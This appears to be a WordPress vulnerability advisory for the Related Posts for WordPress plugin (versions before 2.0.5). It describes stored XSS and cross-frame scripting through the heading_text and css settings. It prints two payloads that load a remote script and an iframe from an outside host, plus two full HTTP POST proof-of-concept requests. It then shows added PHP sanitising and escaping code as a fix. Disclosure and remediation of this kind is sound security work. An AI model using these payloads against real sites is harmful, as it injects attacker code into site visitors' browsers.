WordPress Plugin Vulnerabilities
Related Posts for WordPress < 2.0.5 - Authenticated Stored XSS & XFS
Description
The plugin does not sanitise its heading_text and css settings, allowing high-privilege users (admin) to store XSS payloads in them, leading to Stored Cross-Site Scripting and Cross-Frame Scripting issues.
Proof of Concept
Payloads:

[$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x
[$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x

PoC #1 | Authenticated Persistent XSS & XFS | Heading text:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x

PoC #2 | Authenticated Persistent XSS & XFS | CSS:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x
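The root cause described above is a settings array accepted from options.php without a sanitize callback and printed back without escaping. The following is an added example of the defensive pattern that closes this class of issue in a WordPress plugin; it is not the plugin's own code or its actual fix. The option group and name rp4wp and the keys heading_text, css, automatic_linking, automatic_linking_post_amount, excerpt_length and display_image are taken from the request parameters in the PoC; every function name prefixed rp4wp_example_ is hypothetical.

```php
<?php
// Added example, not the plugin's code. Demonstrates sanitising the rp4wp
// settings on save and escaping them on output, the two halves of the defence
// the advisory says were missing. Option keys come from the PoC request;
// all rp4wp_example_* function names are hypothetical.

/**
 * Sanitise the rp4wp settings array before WordPress stores it.
 * Registered as the register_setting() sanitize_callback, so options.php
 * runs it on every update, including requests like the ones in the PoC.
 * options.php already applies wp_unslash() before calling this.
 */
function rp4wp_example_sanitize_settings( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();

    // Heading is plain text: strip tags, normalise whitespace.
    $clean['heading_text'] = isset( $input['heading_text'] )
        ? sanitize_text_field( $input['heading_text'] )
        : '';

    // Custom CSS is later printed inside <style> (front end) and <textarea>
    // (admin form). Stripping every tag, then every '<', means no stored value
    // can open a tag or close the element it is printed into. CSS itself
    // never needs '<', but '>' (child combinator) is kept.
    $css = isset( $input['css'] ) ? wp_strip_all_tags( $input['css'] ) : '';
    $clean['css'] = str_replace( '<', '', $css );

    // Numeric and boolean settings: coerce to the expected type.
    $clean['automatic_linking']             = empty( $input['automatic_linking'] ) ? 0 : 1;
    $clean['automatic_linking_post_amount'] = isset( $input['automatic_linking_post_amount'] )
        ? max( 1, absint( $input['automatic_linking_post_amount'] ) )
        : 3;
    $clean['excerpt_length'] = isset( $input['excerpt_length'] ) ? absint( $input['excerpt_length'] ) : 0;
    $clean['display_image']  = empty( $input['display_image'] ) ? 0 : 1;

    return $clean;
}

add_action( 'admin_init', function () {
    register_setting(
        'rp4wp', // option group, matches option_page=rp4wp in the PoC
        'rp4wp', // option name holding the settings array
        array(
            'type'              => 'array',
            'sanitize_callback' => 'rp4wp_example_sanitize_settings',
        )
    );
} );

/**
 * Admin form fields. Escaping at output is required in addition to sanitising
 * on save, because values stored before the fix may still be unsanitised.
 * esc_attr() neutralises the '">' attribute breakout, esc_textarea() the
 * '</textarea>' breakout used in the second payload.
 */
function rp4wp_example_render_fields() {
    $opts    = (array) get_option( 'rp4wp', array() );
    $heading = isset( $opts['heading_text'] ) ? $opts['heading_text'] : '';
    $css     = isset( $opts['css'] ) ? $opts['css'] : '';
    ?>
    <input type="text" name="rp4wp[heading_text]" value="<?php echo esc_attr( $heading ); ?>">
    <textarea name="rp4wp[css]"><?php echo esc_textarea( $css ); ?></textarea>
    <?php
}

/** Front-end output of the heading and the custom CSS. */
function rp4wp_example_output_frontend() {
    $opts = (array) get_option( 'rp4wp', array() );
    if ( ! empty( $opts['heading_text'] ) ) {
        echo '<h3>' . esc_html( $opts['heading_text'] ) . '</h3>';
    }
    if ( ! empty( $opts['css'] ) ) {
        // Re-apply the same filtering at output so a pre-fix stored value
        // cannot close the <style> element.
        echo '<style>' . str_replace( '<', '', wp_strip_all_tags( $opts['css'] ) ) . '</style>';
    }
}
```

Sanitising on save alone is insufficient for a stored issue: sites that upgraded after a payload was saved would still render it, so the output escaping in rp4wp_example_render_fields() and rp4wp_example_output_frontend() is what actually stops the stored payloads from executing. A stricter CSS allow-list (for example validating each declaration) would be an improvement over the character filtering shown here.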
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-17
Added
2021-06-25
Last Updated
2022-01-02